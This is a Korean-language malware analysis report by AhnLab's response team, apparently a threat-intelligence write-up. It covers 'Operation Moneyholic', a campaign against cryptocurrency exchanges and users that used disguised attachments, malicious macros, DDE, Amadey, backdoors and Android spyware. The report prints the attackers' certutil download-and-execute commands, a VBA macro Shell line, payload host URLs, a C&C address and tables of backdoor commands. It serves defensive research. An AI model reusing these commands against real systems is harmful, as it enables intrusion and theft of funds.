Operation Moneyholic 금전적이득을목적으로한최신표적공격사례분석 ASEC 대응팀 경기도성남시분당구판교역로 220 ( 우 ) 대표전화 : 팩스 : Ah

목차 개요... 3 악성코드상세분석... 4 1. 파일명의이중확장자및공백... 4 2. 다양한기법을이용한위장용문서파일제작... 15 3. 아마데이 (Amadey) 백도어... 25 4. 계속되는악성코드변화 (2019 년상반기 )... 29 5. 추가악성코드종류및특징... 35 악성코드프로파일링... 42 1. 악성코드비교... 42 2. 악성코드유포지와문자열 Jerry... 49 3. 동일한 C&C, 두개의흔적... 53 4. 문자열 Jhon 또는 John... 56 결론... 60 안랩제품대응현황... 61 IoC (Indicators of Compromise)... 64 별첨... 67 AhnLab, Inc. All rights reserved. 2

개요 한때세계적인투기열풍이불었던암호화폐 (Cryptocurrency) 는각국의암호화폐정책이나경기변화의영 향으로등락을반복하고있지만, 투자아이템으로자리를잡았다는것이중론이다. 암호화폐가투자자산으로인기를얻기시작하면서다수의해킹조직들도암호화폐에관심을보이기시작했다. 이들은복구비용으로암호화폐를요구하는랜섬웨어를시작으로, 암호화폐를채굴 (mining) 하는마이너 (Miner, 또는 Coin miner), 크랩토재킹 (Cryptojacking) 등암호화폐탈취를위해다양한형태의악성코드를제작, 유포하고있다. 또국내외주요암호화폐거래소를공격하거나암호화폐사용자의계정을해킹하는사건도심심치않게발생하고있다. 안랩은지난 2018 년초부터암호화폐거래소와이용자를노리는악성코드와표적공격의징후를포착하고, 이를오퍼레이션머니홀릭 (Operation Moneyholic) 으로명명했다. 본보고서에는암호화폐탈취를통해금전적이득을얻기위해유포된악성코드의주요특징과변화를분석 하는한편, 특정국가에서운영하고있는해킹조직과의관련성에대해기술적인근거를살펴본다. AhnLab, Inc. All rights reserved. 3

악성코드상세분석 2018 년 2 월부터 2019 년 8 월현재까지오퍼레이션머니홀릭조직이사용한악성코드를분석한결과, 주요공 격대상은암호화폐거래소와이용자로좁혀졌다. 오퍼레이션머니홀릭이사용한주요악성코드의특징 과변화는다음과같다. 1. 파일명의이중확장자및공백 2018 년중 후반까지이메일첨부파일형태로유포된악성코드는 [ 표 1] 과같이크게두가지형태가 존재하는데, 공통적으로파일명에이중확장자를사용하거나확장자사이에공백을적용했다. 파일명 유형 1 WXB 코인배정내용 - 송부용.xlsx.exe 유형 2 *** 조직 3 차 -5 차마지막 BCOT 구매리스트및수량계산확인.hwp.exe [ 표 1] 이중확장자및공백을사용한악성코드 [ 표 1] 의유형 1 과유형 2 의파일명에서첫번째확장자 ( 각각.xlsx,.hwp) 는공격대상 ( 수신자 ) 의의심을 피하기위해문서파일로위장한것으로, 실제확장자는뒤에나오는두번째확장자 (.exe) 이다. 공격대 상이메일에첨부된이들파일을실행하면 [ 그림 1] 과같은과정으로동작한다. AhnLab, Inc. All rights reserved. 4

[ 그림 1] 악성코드동작과정 [ 표 1] 의악성코드는유형에따라다음과같은특징을갖고있다. (1) 유형 1: 정상파일생성및악성코드다운로드유형 1의악성코드 ( 파일 ) 이실행되면내부에존재하는정상파일을생성하여공격대상에게보여준다. 이때 [ 그림 2] 와같이이메일에첨부된악성파일의첫번째확장자와코드를비교해생성할정상파일의확장자를결정한다. [ 그림 2] 유형 1 의악성파일 (.xlsx{ 공백 }.exe) 의정상파일 (xls) 생성과정 AhnLab, Inc. All rights reserved. 5

유형 1의파일 ( WXB 코인배정내용 - 송부용.xlsx{ 공백 }.exe ) 이생성한정상파일 (.xls) 에는암호화폐거래소로추정되는회사의임직원개인정보와각임직원별암호화폐보유현황이기록되어있었다. 생성된정상파일 (.xls) 에기록된내용이실제로유효한내용인지확인할수없었지만, 공격자가임의로작성했다기보다해킹등을통해획득한내용으로추정된다. 또한, [ 그림 1] 의동작과정중메일에첨부된악성파일실행시다운로드되는 1.txt 파일은배치파일 (batch file) 로, [ 표 2] 와같이운영체제에따라악성코드를추가로다운로드한다. :32BITOS certutil urlcache split f http://881.000webhostapp.com/setup1.txt > nul certutil decode f setup1.txt setup.cab > nul del /f /q setup1.txt > nul GOTO ISEXIST :64BITOS certutil urlcache split f http://881.000webhostapp.com/setup2.txt > nul certutil decode f setup2.txt setup.cab > nul del /f /q setup2.txt > nul GOTO ISEXIST [ 표 2] 유형 1 의배치파일 (1.txt) 정보 1.txt 배치파일에의해다운로드된 setup1.txt( 또는 setup2.txt) 파일은 cab 파일이다. 해당파일은 BASE64 로암호화되어있으며, 복호화하면 [ 그림 3] 와같이내부에압축파일이존재하고있음을알수 있다. AhnLab, Inc. All rights reserved. 6

[ 그림 3] BASE64 로암호화된 setup1.txt [ 그림 3] 에서볼수있는것처럼 setupt1.txt 파일에는 4 개의파일이포함되어있는데, 그중핵심은 TiWorker.exe 이다. TiWorker.exe 파일은백도어기능을수행하며, 나머지 3 개의파일은 TiWorker.exe 를실행 하기위한보조기능을수행한다. 파일명 기능 install.bat NTWDBLIB.dll update.dll TiWorker.exe가외부와통신하도록윈도우방화벽의 in/outbound 정책에추가 HKCU\Software\Microsoft\Windows\CurrentVersion\Run에추가 윈도우 7 이하에서정상파일 cliconfg와함께실행 -> install.bat 실행, UAC Bypass 윈도우 10에서 install.bat 실행, UAC Bypass [ 표 3] 보조파일의기능정보 TiWorker.exe 는온라인에소스코드가공개된중국산백도어를기반으로제작되었으며, C&C 서버와통신할 때 [ 그림 4] 와같이특정시그니처 (fxftest) 를전송한다. AhnLab, Inc. All rights reserved. 7

[ 그림 4] TiWorker.exe 소스코드및 C&C 통신패킷 [ 표 4] 는분석을통해확인한 TiWorker.exe 파일의주요기능을정리한것이다. 명령 설명 case 1 GetDriver(sktClient); 논리드라이브목록 case 2 ListFile(sktClient,mycommand.Parameter); 파일리스트 case 3 RunProc(sktClient,mycommand.Parameter); 파일실행 : WinExec(path,SW_HIDE); case 4 DelFile(sktClient,mycommand.Parameter); 파일삭제 : DeleteFile(path) case 5 DownFile(sktClient); 파일생성 : CreateFile() case 6 UpFile(sktClient,mycommand.Parameter); 파일업로드 : CreateFile(), CreateFileMapping() case 7 ListProc(sktClient); 프로세스리스트 : CreateToolhelp32Snapshot() case 8 KillProc(sktClient,mycommand.Parameter); 프로세스종료 : TerminateProcess() case 9 CreateCmd(sktClient); cmd.exe 실행 : CreateProcess(() case 10 RunCmd(sktClient,mycommand.Parameter); cmd.exe 실행 : WriteFile() case 11 CloseCmd(sktClient); cmd.exe 핸들종료 case 12 TestConnect(sktClient); C&C 서버와통신테스트 [ 표 4] TiWorker.exe 의백도어기능 AhnLab, Inc. All rights reserved. 8

(2) 유형 2: 정상파일생성및악성코드다운로드유형 2의악성파일은유형 1의파일과는조금다르게동작한다. 유형 1은공격대상에게보여주기위한위장용정상파일을자기내부에갖고있었으나, 유형 2는 C&C 서버에서 BASE64로암호화된정상파일과악성코드를다운로드한다. 정상한글파일다운로드 "certutil -urlcache -split -f http://attach10131.1apps.com/11.txt %temp%/4.txt && certutil -decode - f %temp%/4.txt \"%cd%/*** 조직 3차 -5차마지막 BCOT 구매리스트및수량계산확인.hwp\" && start \"C:\\Program Files (x86)\\hnc\\hwp80\\hwp.exe\" \"*** 조직 3차 -5차마지막 BCOT 구매리스트및수량계산확인.hwp\" 악성코드다운로드 copy /Y %windir%\system32\certutil.exe %TEMP%\ct.exe && cd /d %TEMP% && ct -urlcache -split - f http://attach10131.1apps.com/1.txt && ct -decode-f 1.txt 1.bat && del /f /q 1.txt && 1.bat [ 표 5] 유형 2 의배치파일 (1.txt) 정보 [ 표 5] 의 11.txt 파일은 BASE64 로암호화되어있으며, 복호화하면암호화폐와관련된내용의정상적인 한글파일이나타난다. 특이한점은파일의지은이 ( 작성자 ), 즉해당파일을생성한이가 ASPNET 계정을 사용했다는것이다. [ 그림 5] 11.txt 파일정보 AhnLab, Inc. All rights reserved. 9

해당계정은 TiWorker.exe 를통해추가유포된악성코드 (DnsCacheUpdate.dll 등 ) 가감염 PC 에생성하는 원격데스크톱 (RDP) 계정으로, 이에대한내용은별도로 ((5) 추가악성코드의종류및특징 ) 살펴본다. [ 그림 6] 정상한글파일의지은이정보 attach10131.1apps.com에는악성파일 3개 (1.txt ~ 3.txt) 와공격대상에게보여주기위한정상파일 8개 (4.txt ~ 11.txt) 가존재한다. 8개의정상파일은공통적으로암호화폐와관련된내용의문서파일이었으며, 마지막으로저장한사람이 ASPNET 이다. 또 [ 표 6] 과같이작성한날짜가동일하며, 마지막수정날짜 ( 시간 ) 은다소의차이가있다. 파일명작성한날짜마지막수정한날짜 4.txt 2018 년 5 월 21 일월요일오전 11:20:16 2018 년 5 월 21 일월요일오후 3:39:52 5.txt 2018 년 5 월 21 일월요일오전 11:20:16 2018 년 5 월 21 일월요일오후 3:25:09 6.txt 2018 년 5 월 21 일월요일오전 11:20:16 2018 년 5 월 21 일월요일오후 3:36:01 7.txt 2018 년 5 월 21 일월요일오전 11:20:16 2018 년 5 월 21 일월요일오후 2:48:53 8.txt 2018 년 5 월 21 일월요일오전 11:20:16 2018 년 5 월 21 일월요일오후 3:28:48 9.txt 2018 년 5 월 21 일월요일오전 11:20:16 2018 년 5 월 21 일월요일오후 2:56:37 10.txt 2018 년 5 월 21 일월요일오전 11:20:16 2018 년 5 월 21 일월요일오후 3:05:58 11.txt 2018 년 5 월 21 일월요일오전 11:20:16 2018 년 5 월 21 일월요일오전 11:47:29 [ 표 6] 정상파일의등록정보 AhnLab, Inc. All rights reserved. 10

위에서살펴본내용을통해오퍼레이션머니홀릭은 ASPNET 계정으로로그인후정상한글파일 1 개로내 용이다른정상한글문서 7 개를추가로만들었으며, 악성코드유포시공격대상의의심을피하기위해 이들문서파일을보여주었음을알수있다. 한편, 유형 1 의악성파일인 1.txt 는 BASE64 로암호화된배치파일로, [ 표 2] 에서설명한유형 1 의배치 파일 (1.txt) 과동일한기능을수행한다. [ 그림 7] 유형 2 의배치파일 (1.txt) 정보 유형 1 과마찬가지로배치파일 (1.txt) 이다운로드하는파일은압축파일 (cab) 이며, 해당파일의내부에는다 수의악성코드가존재한다. 그중핵심파일은 ipnet.dll 과 ipnet.dll 이참조하는 ipnet.ini 이며, ini 파일에는 AhnLab, Inc. All rights reserved. 11

C&C 주소가암호화되어있다. 그러나, 유형 1 의백도어인 TiWorker.exe 는 C&C 서버와 TCP 80 번포트로통 신하는반면, 유형 2 의백도어인 inpnet.dll 은 C&C 서버의 FTP 서비스를사용한다. [ 그림 8] 유형 1 과유형 2 의 cab 파일내부비교 [ 표 7] 은분석을통해확인한 ipnet.dll 의기능을정리한것이다. 명령 설명 case 1 /usr CreateProcessAsUserA(): 프로세스실행 case 2 Pull, /f 파일복사후 C&C로업로드그리고삭제 cmd /c case 3 chip 파일삭제후파일생성 case 4 put 파일복사후삭제 [ 표 7] ipnet.dll 의백도어기능 ipnet.dll 은악성코드제작시간을기준으로 2014 년 5 월 29 일 (11 시 26 분 ) 에처음나타난것으로추정되며, 이메일을통해국내특정기관에유입됐다. 당시국내보안업체에서악성코드정보를공개하면서관련 내용의일부가기사화된바있다. < 관련기사 > 북한위성내용가장한사이버공격용악성코드발견 http://www.dt.co.kr/contents.html?article_no=2014061002019960800002 AhnLab, Inc. All rights reserved. 12

[ 그림 9] 2014 년 5 월에유포된악성코드의동작과정 [ 그림 9] 에서 1.scr 이생성한정상문서파일 (DOC) 은북한동해위성발사대건설과관련된내용을포함하 고있었다. temp.zip 에는다수의악성코드가존재하며, 그중 ipnet.dll 은앞서살펴본유형 2 의 cab 파일 ([ 그림 8] 오른쪽 ) 에포함되어있던 ipnet.dll 의변종이다. [ 그림 10] 은 2014 년 5 월에유포된악성코드에포함된 ipnet.dll( 왼쪽 ) 과유형 2 의 cab 파일에포함되어있 던 ipnet.dll( 오른쪽 ) 을비교한것이다. 2014 년 5 월의 ipnet.dll 은웹통신을, 유형 2 의 cab 파일에포함된 ipnet.dll 은 FTP 를통해 C&C 와통신한다는점에서차이를보인다. AhnLab, Inc. All rights reserved. 13

10 8 6 7 6 4 2 0 3 0 0 0 2014 2015 2016 2017 2018 2019 [ 그림 11] ipnet.dll 의변종유포추이 2. 다양한기법을이용한위장용문서파일제작 오퍼레이션머니홀릭조직은 2018 년후반부터 DDE, 매크로, 문서취약점 (OLE/Cve-2017-8570 등 ) 을이용해 위장용문서파일을제작, 악성코드를유포했다. [ 그림 12] 2018 년하반기이후의악성코드동작과정 AhnLab, Inc. All rights reserved. 15

공격대상 ( 이메일수신자 ) 이첨부된악성파일을실행하면, [ 그림 12] 와같은과정으로악성코드가동작한 다. 이때공격대상 ( 이메일수신자 ) 이악성코드감염을인지할수없도록다음과같이다양한기법을사용해 위장용문서를제작했다. (1) 악성매크로가포함된시트숨기기공격대상이이메일에첨부된 시멘트제품지표분석.doc 파일을열면 [ 그림 13] 과같이빈문서가나타난다. 그러나아무내용도없는것같은이문서의내부에는악성매크로가포함된시트가존재한다 ( 이해를돕기위해 [ 그림 13] 에는숨겨진시트를표시함 ). 공격대상은빈문서로보이는해당파일을단순히잘못된파일로생각하기쉽다. 따라서다수의알림창이나타나면매크로허용을클릭하게되고, 이로써악성매크로가실행되어악성코드를다운로드한다. [ 그림 13] 문서 (.doc) 파일로위장한악성파일의매크로실행과정 (2) 콘텐츠사용 클릭유도를통한악성매크로실행 MS오피스 (MS Office) 프로그램은문서에매크로 (Macro) 가포함되어있을경우, 매크로의정상또는악성여부와상관없이기본적으로차단한다. 그리고노란색타이틀바를표시해사용자에게 콘텐츠사용 여부를묻는다. 공격자들은바로이점을이용해악성매크로가포함된문서를제작, 유포하고있다. AhnLab, Inc. All rights reserved. 16

[ 그림 14] 는악성매크로가포함된파일을이용한공격사례로, 해당파일을열면빈문서가나타나며 매크로가차단되어문서내용을볼수없다는식으로공격대상의클릭을유도한다. 공격대상이 콘텐 츠사용 버튼을클릭하면악성매크로가실행된다. [ 그림 14] 문서파일 (.doc) 에포함된악성매크로실행전과후 악성매크로가실행되면 [ 그림 15] 와같은코드에의해문서에존재하는텍스트가검은색으로변경돼문서의내용이나타난다 ([ 그림 14] 의오른쪽 ). 만일 [ 그림 15] 의.Font.ColorIndex = wdblack 부분이.Font.ColorIndex = wdred 라면문서의내용은붉은색으로표시된다. 이때악성코드에감염된사실을인지할수없도록업무와관련된내용이나호기심을자극하는내용의문서를보여준다. [ 그림 15] 매크로에포함된 ColorIndex Property (3) DDE(Dynamic Data Exchange) 악용오퍼레이션머니홀릭조직은악성코드유포시매크로외에도 DDE(Dynamic Data Exchange) 기능을악용했다. MS 워드의 DDE(Dynamic Data Exchange) 는애플리케이션간의데이터업데이트를위한기능으로, 프로그램의취약점이아닌정상적인기능이다. 악성코드가프로그램의정상적인기능을이용하는경우도적지않다. 웹사이트에서다운로드하거나이메일에첨부된워드파일을열었을때 [ 그림 16] 과같은알림창이나타날 AhnLab, Inc. All rights reserved. 17

경우, 무조건 예 를클릭해서는안된다. [ 그림 16] 워드프로그램에서 DDE 실행을알리는메시지창 MS 워드파일로위장한악성파일 ( 거래내역.doc) 을열면 [ 그림 17] 과같은메시지가나타난다. 해당메시지를보고간혹문서파일에매크로가존재하는것처럼오해할수있지만, 이는의심을피하기위한단순이미지다. 그러나해당파일 ( 거래내역.doc) 에는매크로가존재하지않으며, 이미지바로아래에붉은색박스로표시된부분이 DDE(Dynamic Data Exchange) 를통해악성코드가삽입된영역이다. 육안으로봤을때는악성코드가삽입된영역에는빈칸과 = 만존재할뿐이다. [ 그림 17] 워드파일 ( 거래내역.doc) 에삽입된악성정보영역 AhnLab, Inc. All rights reserved. 18

공격대상이 거래내역.doc 파일을실행하면폴더경로 %TEMP% 에악성스크립트파일 (js) 이생성된다. 생 성된스크립트파일은다시파일 main.txt 을다운로드한다. 다운로드된 main.txt 파일난독화된영역에는 실행파일이존재하며, 이실행파일은특정 URL 에서악성코드를다운로드한다. [ 그림 18] 악성워드파일에삽입된악성스크립트파일및다운로드된 main.txt AhnLab, Inc. All rights reserved. 19

한편, 거래내역.doc 파일에서갠드크랩 (GandCrab) 랜섬웨어와유사한점이확인됐다. [ 그림 19] 와같이각각의문서파일을열었을때생성되는악성스크립트파일과특정 URL에서다운로드한난독화된악성스크립트파일의앞부분이유사하다. 이로미루어이들두파일은동일한자동화툴을이용해제작된것으로추정된다. 그러나이것이동일한조직이두파일을제작했음을의미하는것은아니다. [ 그림 19] 오퍼레이션머니홀릭파일 ( 거래내역.doc) 과갠드크랩랜섬웨어관련파일 ( 경찰고시.doc) (4) 악성코드유포지및명령프롬프트경로악성코드유포지를분석한결과, 디렉토리리스팅이존재하는유포지를확인했다. 해당유포지에는 [ 그림 20] 과같이다수의악성코드가존재했다. 파일명은다르지만파일의크기가비슷하며, 업로드된날짜의차이가없다는점으로보아동일한악성매크로생성도구를이용하여제작한것으로추정된다. AhnLab, Inc. All rights reserved. 20

매크로는악성행위를수행하는명령문이저장되는변수 smo 와명령문실행을위한명령프롬프트 (CMD) 의경로가저장되는변수 scl 등두개의변수를사용한다. 명령문은 smo 에평문으로저장되어 있으며, scl 은난독화되어기록되어있다. 매크로 Dim smo As String smo = "copy /Y %windir%\system32\certutil.exe %TEMP%\ct.exe && cd /d %TEMP% && ct -urlcache -split -f http://gmaildown.1apps.com/1.txt && cd /d %TEMP% && ren 1.txt 1.bat && 1.bat" scl = scl + smo nresult = Shell(sCL, vbhide) ActiveDocument.Save End Sub [ 표 8] 변수 smo [ 그림 23] 변수 scl 의복호화과정 AhnLab, Inc. All rights reserved. 22

매크로의주기능은명령프롬프트실행하여변수 smo 의명령문을동작시키는것이다. 하지만 [ 표 8] 의 매크로는 x64 환경에서는정상적으로동작하지만 x86 환경에서는동작하지않는다. 그원인은 [ 표 9] 와 같이변수 scl 에잘못된명령프롬프트의경로가저장되어있어실행되지않기때문이다. 변수명 x86 환경 x64 환경 scl C:\Windows C:\Windows\Sysnative\cmd.exe /q /c scl + smo C:\Windowscopy /Y C:\Windows\Sysnative\cmd.exe /q /c copy /Y [ 표 9] 변수 scl 에저장되는정보 정상적인명령프롬프트의경로는 C:\Windows\Sysnative\cmd.exe이다. 그러나 [ 표 9] 에빨간색으로표시된부분과같이 x86에저장된명령프롬프트의경로는 C:\Windows로, 이에따라악성코드가동작할수없다. 오퍼레이션머니홀릭조직이 x86 환경은감염대상에서제외한것이거나 3월 29일과 4월 1일에제작한악성코드를테스트하지않은채유포한것으로추정할수있다. (5) 사회공학기법공격자들은공격대상의관심을유도하고공격의성공률을높이기위해정치, 경제, 문화등사회적관심이높은주제를이용하는사회공학기법 (Social Engineering) 을자주활용한다. 앞서언급한특정악성코드유포지에는최근국내를비롯해해외에서도많은팬덤을형성하고있는아이돌조직 ( 방탄소년단, BTS) 관련내용으로위장한악성압축파일이존재했다. [ 그림 24] 3 월 27 일유포지에존재하는악성코드 해당악성압축파일 (BTS 자료.zip) 내부에는 49 초분량의동영상 1 개와이중확장자를사용하여문서파일 (.docx) 로위장한스크립트파일 (Visual Baisc Script, VBS) 이존재한다 ([ 그림 25]). AhnLab, Inc. All rights reserved. 23

[ 그림 25] 악성압축파일 (BTS 자료.zip) 내부에존재하는파일 악성압축파일에포함된파일중악의적인기능을수행하는것은 VBS 파일로, 해당파일이실행되면악성코드를다운로드한다. VBS 파일이다운로드한악성코드가실행되면 [ 그림 26] 과같이 BTS 화보집및스토리북 이라는내용의문서가나타나며, 콘텐츠사용 버튼의클릭을유도한다. 이를통해악성매크로가실행되어추가악성코드를다운로드한다. [ 그림 26] 스크립트파일 (VBS) 과위장용문서파일 (ycy.doc) AhnLab, Inc. All rights reserved. 24

3. 아마데이 (Amadey) 백도어 2018 년하반기이후가장눈에띄는변화는 아마데이 (Amadey) 라고불리는봇넷 (Botnet) 을사용한것이다. 2018 년하반기부터유포된 cab 파일, 즉 BASE64 로암호화된 txt 파일이복호화된파일에는아마데이 (Amadey) 가포함되어있다. [ 그림 27] 아마데이 (Amadey) 관리패널 아마데이 (Amadey) 는러시아개발자가제작한봇넷악성코드로, 2019년초부터해킹포럼을통해온라인에서판매되고있다. 라이선스비용은추적을피하기위해암호화폐 ( 비트코인 ) 로거래하고있다. 공격자는아마데이봇넷에감염된시스템에원하는파일을다운로드및실행하도록작업명령을내릴수있으며, 감염된시스템의정보도볼수있다. [ 그림 28] 아마데이 (Amadey) 의작업명령패널 오퍼레이션머니홀릭조직이유포한아마데이 (Amadey) 는다음과같은특징을보인다. AhnLab, Inc. All rights reserved. 25

(1) 정상파일로위장한외형 오퍼레이션머니홀릭이유포한아마데이 (Amadey) 의외형은 [ 그림 29] 와같이정상파일처럼위장하고있다. 따라서문자열을확인하는방법으로악성여부를확인하기에는어려움이있다. [ 그림 29] Amadey 외형의문자열 아마데이의외형은공통적으로 [ 그림 30] 에붉은색으로표시된부분과같은특징을보인다. 여기에서 VirtualProtect() 로보호되는영역에존재하는데이터는암호화된쉘코드 (Shellcode) 와아마데이 (Amadey) 로 구성되어있다. [ 그림 30] Amadey 외형의특징 (2) 메모리에서실행아마데이의외형은감염 PC에파일로존재하고실행되지만, 실제백도어기능을하는아마데이는 [ 그림 31] 과같이메모리에서실행파일로재구성된후실행된다. 또 [ 그림 31] 의 ❸과같이메인 Custom API를포함한다수의하위 Custom API를사용한다. AhnLab, Inc. All rights reserved. 26

[ 그림 31] Amadey 실행과정 (3) 감염 PC 정보확인및추가악성코드다운로드아마데이에서사용하는주요문자열 (C&C 또는설치된백신명 ) 은암호화되어있으며, 자체복호화코드를통해복호화된다. 예들들어, 아마데이의복호화된일부문자열에서백신명이확인되며, 감염 PC에해당백신이설치되어있는지확인한다. 또한확인한결과를아래와같이 FLAG로설정하여 C&C 서버에전송한다. 이는관리자페이지에서감염 PC의백신사용여부및백신명등의현황을파악하기위한목적이다. 아마데이를통해백신무력화기능을탑재한악성코드를추가로유포할가능성도있다. [+] 대상백신리스트 ( 괄호안의숫자는각백신별 FLAG) 설치안됨 (0), AVAST Software(1), Avira(2), Kaspersky Lab(3), ESET(4), Panda Security(5), Doctor Web(6), AVG(7), 360TotalSecurity(8), Bitdefender(9), Norton(10), Sophos(11), Comodo(12) [ 그림 32] 백신설치확인결과를 FLAG 로 C&C 서버에전송 AhnLab, Inc. All rights reserved. 27

감염 PC 의백신확인결과가 FLAG 로전송되면 [ 그림 33] 과같이아마데이의관리자메뉴에 AV 탭 에해당 정보가표시된다. [ 그림 33] Amadey 관리자화면에표시된감염 PC 의백신정보 아마데이변종과 C&C 서버 (http://result-viewer.com/cc/index.php) 가통신하는패킷을캡쳐하여분석한결 과, 오퍼레이션머니홀릭조직이감염 PC 에추가악성코드 ( 분석당시 x64 용 TiWorker.exe) 를유포한것이 확인되었다. [ 그림 34] C&C 와통신및악성코드 (TiWorker.exe) 다운로드 또한, 아마데이를통해유포된 TiWorker.exe 와 C&C 서버의통신패킷을캡쳐하여분석한결과, [ 그림 35] 와 같이일정한패턴을보였다. [ 그림 35] 감염 PC 와 C&C 의통신패턴 AhnLab, Inc. All rights reserved. 28

[ 그림 35] 에서핵심은 3번과 4번단계로, 오퍼레이션머니홀릭조직은감염 PC에암호화폐관련데이터과같이의미있는데이터가존재하면해당데이터를탈취하기위한악성코드를추가로다운로드했다. 또한감염 PC의프로세스목록에가상환경으로의심할만한프로세스가실행중이라면분석용 PC로판단하고분석을방해하기위해 MBR 파괴악성코드를추가로다운로드했다. [ 그림 36] 는안랩의분석당시오퍼레이션머니홀릭조직이가상환경의분석 PC 로 MBR 파괴악성코드를 추가로유포한패킷이다. MBR 파괴악성코드의기능은이후상세히설명한다 ( (5) 추가악성코드종류및 특징 참고 ). [ 그림 36] MBR 악성코드유포패킷 4. 계속되는악성코드변화 (2019 년상반기 ) (1) 정보수집목적의악성코드탑재 2019년 5월부터유포된악성코드 (cab) 에는앞서살펴본백도어 (TIWorker.exe, ipnet.dll 또는 Amadey) 가존재하지않았다. 대신, 운영체제에서지원하는콘솔명령을사용하여감염 PC의파일및폴더리스트, 운영체제및하드웨어사양등의정보를수집하는배치파일과수집한정보를 C&C 서버로전송하는실행파일 Sendfile.exe가확인됐다. AhnLab, Inc. All rights reserved. 29

[ 그림 37] 악성코드 (cab) 에포함된배치파일 ( 왼쪽 ) 과 Sendfile.exe( 오른쪽 ) [ 그림 38] C&C 서버로전송되는감염 PC 의프로세스정보 (2) 안드로이드스마트폰공격오퍼레이션머니홀릭조직은윈도우운영체제용악성코드뿐만아니라안드로이드운영체제용악성앱도제작, 유포했다. 악성앱은 [ 그림 39] 와같이윈도우운영체제용악성코드유포지와동일한서버에서발견되었다. AhnLab, Inc. All rights reserved. 30

[ 그림 39] 3 월 28 일유포지에업로드된악성앱 악성앱은윈도우운영체제용악성코드와마찬가지로스피어피싱메일을통해유포된것으로추정되며, 공 격대상이사용하는포털사이트에따라 [ 그림 40] 과같은앱으로위장했다. DaumProtect.apk Kakaotalk.apk NaverProtect.apk [ 그림 40] 악성앱 AhnLab, Inc. All rights reserved. 31

또한 [ 그림 41] 과같이포털사이트의계정보호를위한보호앱설치페이지로위장했는데, 해당페이지 는 2019 년 3 월 14 일경제작되었다. [ 그림 41] 포털사이트보호앱설치로위장한페이지 [ 그림 41] 의허위페이지에서확인버튼을클릭하면, 연결된웹브라우저의 User-agent 를확인한다. Useragent 가 PC 라면 모바일환경에서만설치가가능합니다 라는메시지를출력하고, User-agent 가모바일이라 면악성앱다운로드링크로연결한다. [ 그림 42] User-agent 별연결과정 AhnLab, Inc. All rights reserved. 32

한편, 이들악성앱의서명에사용한인증서에 Jhon 이라는문자열이존재했다. 이와관련된내용은 악성코 드프로파일링 에서상세히살펴본다. 항목 DaumProtect.apk NaverProtect.apk Package Name Serial Number Subject DN Issuer DN app.project.appcheck 4406110b CN=Jhon CN=Jhon [ 표 10] 악성앱서명정보 설치된악성앱을실행하면아이콘을숨긴후, 사용자의의심을피하기위해각각의포털사이트정책 (policy) 페이지로연결한다. [ 그림 43] 악성앱이네이버일경우 [ 그림 44] 악성앱이다음일경우 AhnLab, Inc. All rights reserved. 33

이후백그라운드상태에서 C&C 서버와통신하며 [ 표 11] 의악성행위를수행한다. 이때탈취한정보는 문서파일 (TXT) 형태로 C&C 서버에전송한다. 항목기능문서파일 (TXT) 정보탈취 명령수행 저장된계정정보연락처정보문자정보설치된앱정보외장 SD카드에저장된파일정보파일업로드 account.txt contact.txt sms_all.txt app.txt sdcard.txt 파일다운로드 파일삭제 문자메시지발송 문자메시지삭제 앱실행 앱설치 앱삭제 [ 표 11] 악성행위정보 AhnLab, Inc. All rights reserved. 34

[ 그림 45] C&C 서버로탈취한정보전송 5. 추가악성코드종류및특징 오퍼레이션머니홀릭조직이감염 PC 를선별한기준은확인할수없지만, 일부감염 PC 에다수의악성 코드를추가로설치했다. 추가로설치된악성코드의종류와특징은다음과같다. (1) RDP(Remote Desktop Protocol) 계정생성 [ 그림 46] DnsCacheUpdate.dll 의 RDP 계정생성 DnsCacheUpdate.dll 이감염 PC 에서실행되면, [ 그림 45] 의기능을통해 RDP 계정이생성된다. 이를통해 AhnLab, Inc. All rights reserved. 35

외부에서감염 PC에무단으로접속한후악의적인행위를할수있다. 일부감염 PC에서는 RDP 서비스를활성화하기위해오픈소스기반의 RDP Wrapper를사용했다. RDP Wrapper는깃허브 (https://github.com/stascorp/rdpwrap/releases) 에설치파일과소스가공개되어있어누구나사용할수있다. 해당파일은정상적인목적으로제작된것으로보이지만, 일부버전이악용된사례가있어안랩은이를 Trojan 또는 Unwanted 로진단및삭제하고있다 (V3 제품기준 ). 안랩은일부감염 PC 분석을통해 RDP 계정이생성된이유를확인할수있었다. [ 그림 47] 과같이감염 PC 1 에는 ASPNET 계정이추가되어있었고, 외부에서 RDP를통해해당 PC에접속이가능했다. 그러나앞서살펴본 [ 그림 46] 에표기된비밀번호를사용해로그인하는것은불가능했다. 따라서분석초기에는최초 RDP 로그인후비밀번호를변경한것으로추정했다. [ 그림 47] 감염 PC 1 에추가된 RDP 계정 (ASPNET) 한편, 감염 PC 1 에설치된 V3 를통해 [ 표 12] 와같은진단정보가확인됐다. 일자진단경로진단명 2018.05.30 C:\Windows\SysWOW64\Utilman.exe Trojan/Win32.Agent.R229237 [ 표 12] 감염 PC 1 의진단정보 (1) Utilman.exe 은 DnsCacheUpdate.dll 와마찬가지로 ASPNET 계정을생성하는기능을갖고있다. 비밀번호를 추출한후 RDP 를통해감염 PC 1 에접속을시도한결과, 로그인에성공했다. 이를근거로감염 PC 1 에 ASPNET 계정을추가한악성코드는 DnsCacheUpdate.dll 가아닌 Utilman.exe 로판단했다. 감염 PC 1 에설치된 V3 에는 Utilman.exe 진단한이후 [ 표 13] 과같이다수의악성코드를진단및삭제한로 AhnLab, Inc. All rights reserved. 36

그가존재했다. 일자진단경로진단명 2018.07.17 C:\Users\ASPNET\Desktop\spoolsve.exe Trojan/Win32.Agent.R231849 2018.07.17 C:\Users\ASPNET\Desktop\Server.vmp.exe Trojan/Win32.Agent.R231849 2018.07.21 C:\Users\ASPNET\Desktop\win7_x64\DnscacheUpdate.dll Trojan/Win32.Agent.R229262 2018.07.21 C:\Users\ASPNET\Desktop\win7_x64\IPCheck.dll Trojan/Win32.Agent.R229524 [ 표 13] 감염 PC 1 의진단정보 (2) 지금까지확인한정보를토대로오퍼레이션머니홀릭조직이악성코드를통해감염 PC에 ASPNET과같은원격데스크톱 (RDP) 계정을생성한이유는크게 2가지로요약할수있다. 감염 PC 악용백신에의해서악성코드가진단및삭제되더라도악성코드가생성한 RDP 계정은남아있기때문에 RDP 를통해감염 PC에무단으로접속해악성코드진단테스트등의악의적인행위를계속할수있다. 추적회피목적일반적으로공격자는자신이제작한악성코드를실제로유포하기전에공격대상이사용하는백신으로진단여부를테스트해보거나 VirusTotal 에업로드하여백신제품의진단현황을확인한다. 이과정에서작은실수로공격자의정보가노출되는경우도있는데, 